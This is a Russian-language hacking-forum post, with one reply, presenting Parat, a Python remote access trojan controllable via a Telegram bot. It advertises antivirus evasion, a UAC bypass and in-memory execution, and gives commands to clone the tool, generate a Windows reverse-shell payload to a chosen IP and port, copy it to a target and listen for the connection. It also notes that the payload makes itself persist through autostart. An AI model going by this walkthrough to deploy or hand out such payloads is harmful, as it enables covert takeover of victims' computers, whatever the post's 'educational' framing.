Статья Parat - Python RAT (Telegram)

Vander

Administrator
Gold Team
16.01.2016
1 087
2 790
#1
Приветствую, уважаемую аудиторию форума! На этот раз я бы хотел вам представить, на мой взгляд, очень неплохую утилиту для удаленного управления целевым хостом, иными словами RAT, под названием Parat.

1519240461075.png

Parat - это инструмент для удаленного администрирования с открытым исходным кодом, он является многопоточным и написан полностью на Python. В основном, использует Python в ядре, для шифрования и обеспечения максимальной приватности.

Протокол версии IPv4 используется для коммуникации.

Особенности Parat:

  • Полностью UnDetectable (FUD)
  • Совместимость с Telegram messanger
  • Обход контроля учётных записей пользователей (User Account Control, UAC)
  • Выполнение в памяти
  • Никаких требований по настройке
Установка (Kali Linux 2018.1):

Код:
git clone https://github.com/micle-fm/Parat
1519240508071.png

Использование:

Parat – использует два режима:

  • Локальный режим
  • Удаленный режим
Локальный режим:

Запуск Parat на своем хосте со списком доступных функций:

  • cd Parat
  • chmod +x main.py
1519240531563.png

  • Контроль локальных параметров
  • Смена параметров пользовательского интерфейса
  • Внесение изменений
  • Использование своей UNIX – оболочки
  • Настройка прослушивающихся портов
  • Генерация полезных нагрузок
К тому же, не следует забывать, что некоторые локальные команды доступны в удаленном режиме.

1519240550094.png

Удаленный режим:

  • Удаленным режимом - называется режим взаимодействия вашего хоста с целевым, где на данный момент выполняется ваша полезная нагрузка. С помощью идентификатора сессий, вы подключаетесь к нужной, и получаете полный контроль над целевым хостом.
Шифрование:

Вы можете установить локальный пароль для клиента parat и удаленных подключений, используя алгоритм самошифрования (который реализует очень простые побитовые трюки) автоматически.

Многопоточность:

Хотя у нас есть разные и более эффективные варианты обработки многопоточности, но в итоге мы решили использовать модуль одно потоковой передачи для Parat. Причина этого выбора в том, что parat - простой инструмент и предназначен только для образовательных целей.

Генерируем полезную нагрузку:

Код:
generate –i 192.168.125.140 –p 443 --platform windows --arch x64 –o shell –d /root
1519240592977.png

Теперь копируем ее на целевой хост и запускаем:

1519240607966.png

На атакующем хосте вводим команду listen 443, тут мы будем ждать входящего соединения:

1519240623896.png

После запуска полезной нагрузки у нас открывается активная сессия с целевым хостом.

1519240639836.png

Вот список доступных команд, для открывшегося шелла:

1519240656375.png

Мною были проверены все команды на Windows 8.1 Full Update – все работает корректно.

  • Хочу уточнить, что на целевом хосте должен быть установлен Python 2.x
Сама полезная нагрузка, не теряя времени, прописывается в автозагрузку при первом запуске.

1519240676478.png

В заголовке темы присутствует слово Telegram, и не просто так. Попробуем осуществить управление сервером с помощью телеграм бота.

Открываем файл – telegram.service и вписываем API своего бота:

Код:
nano /Pentest/Parat/telegram.service
1519240709029.png

Сохраняем и запускаем командой:

Код:
python telegram.service
1519240739825.png

По сути, большого преимущества это не дает, так как команд немного, одна из полезных, на мой взгляд, это генерация полезной нагрузки, и скачивание ее себе на устройство.

Ниже список команд, поддерживаемых в telegram:

1519240755286.png

На этом все, спасибо за внимание.

Специально для Codeby.net.
 

HtOnion

Red Team
06.11.2017
444
573
#2
Хороший инструмент, примерно неделю назад о нем узнал. Правда с телегой не тестил его.